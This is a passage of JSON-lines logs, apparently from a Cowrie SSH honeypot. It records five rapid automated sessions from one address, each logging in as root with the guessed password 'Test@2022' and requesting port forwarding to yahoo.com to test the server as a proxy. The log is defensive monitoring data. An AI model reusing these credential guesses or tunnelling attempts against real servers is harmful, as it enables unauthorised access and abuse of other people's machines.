{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43371,"dst_ip":"1.2.3.4","dst_port":22,"session":"168a9b9e77bb","protocol":"ssh","message":"New connection: 213.209.150.239:43371 (1.2.3.4:22) [session: 168a9b9e77bb]","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.059628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.060403Z","src_ip":"213.209.150.239","session":"168a9b9e77bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.107641Z","src_ip":"213.209.150.239","session":"168a9b9e77bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.342767Z","src_ip":"213.209.150.239","session":"168a9b9e77bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":3794,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:3794","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.391074Z","session":"168a9b9e77bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.438516Z","src_ip":"213.209.150.239","session":"168a9b9e77bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":29663,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29663","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.573548Z","session":"168a9b9e77bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.620773Z","src_ip":"213.209.150.239","session":"168a9b9e77bb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.668681Z","src_ip":"213.209.150.239","session":"168a9b9e77bb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43428,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b4235b43b38","protocol":"ssh","message":"New connection: 213.209.150.239:43428 (1.2.3.4:22) [session: 4b4235b43b38]","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.714802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.715674Z","src_ip":"213.209.150.239","session":"4b4235b43b38"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.762804Z","src_ip":"213.209.150.239","session":"4b4235b43b38"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.997040Z","src_ip":"213.209.150.239","session":"4b4235b43b38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":514,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:514","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.045700Z","session":"4b4235b43b38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.092840Z","src_ip":"213.209.150.239","session":"4b4235b43b38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":15392,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15392","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.229429Z","session":"4b4235b43b38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.276649Z","src_ip":"213.209.150.239","session":"4b4235b43b38"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.324727Z","src_ip":"213.209.150.239","session":"4b4235b43b38"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43482,"dst_ip":"1.2.3.4","dst_port":22,"session":"e47eff31ef03","protocol":"ssh","message":"New connection: 213.209.150.239:43482 (1.2.3.4:22) [session: e47eff31ef03]","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.380287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.381294Z","src_ip":"213.209.150.239","session":"e47eff31ef03"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.437903Z","src_ip":"213.209.150.239","session":"e47eff31ef03"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.719904Z","src_ip":"213.209.150.239","session":"e47eff31ef03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":12641,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:12641","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.777511Z","session":"e47eff31ef03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.834056Z","src_ip":"213.209.150.239","session":"e47eff31ef03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":10510,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:10510","sensor":"my-vps","timestamp":"2025-08-26T01:06:44.991042Z","session":"e47eff31ef03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.047806Z","src_ip":"213.209.150.239","session":"e47eff31ef03"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.105310Z","src_ip":"213.209.150.239","session":"e47eff31ef03"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43616,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d504d69f92c","protocol":"ssh","message":"New connection: 213.209.150.239:43616 (1.2.3.4:22) [session: 8d504d69f92c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.151554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.152692Z","src_ip":"213.209.150.239","session":"8d504d69f92c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.199601Z","src_ip":"213.209.150.239","session":"8d504d69f92c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.434493Z","src_ip":"213.209.150.239","session":"8d504d69f92c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":31271,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:31271","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.482539Z","session":"8d504d69f92c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.529946Z","src_ip":"213.209.150.239","session":"8d504d69f92c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":21704,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:21704","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.665685Z","session":"8d504d69f92c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.712881Z","src_ip":"213.209.150.239","session":"8d504d69f92c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.761314Z","src_ip":"213.209.150.239","session":"8d504d69f92c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43679,"dst_ip":"1.2.3.4","dst_port":22,"session":"7af6ba12b74a","protocol":"ssh","message":"New connection: 213.209.150.239:43679 (1.2.3.4:22) [session: 7af6ba12b74a]","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.807625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.808272Z","src_ip":"213.209.150.239","session":"7af6ba12b74a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:45.855486Z","src_ip":"213.209.150.239","session":"7af6ba12b74a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.090267Z","src_ip":"213.209.150.239","session":"7af6ba12b74a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":13210,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:13210","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.138437Z","session":"7af6ba12b74a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.185896Z","src_ip":"213.209.150.239","session":"7af6ba12b74a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":7646,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7646","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.321574Z","session":"7af6ba12b74a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.368852Z","src_ip":"213.209.150.239","session":"7af6ba12b74a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.416683Z","src_ip":"213.209.150.239","session":"7af6ba12b74a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43734,"dst_ip":"1.2.3.4","dst_port":22,"session":"5df970666653","protocol":"ssh","message":"New connection: 213.209.150.239:43734 (1.2.3.4:22) [session: 5df970666653]","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.462632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.463558Z","src_ip":"213.209.150.239","session":"5df970666653"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","a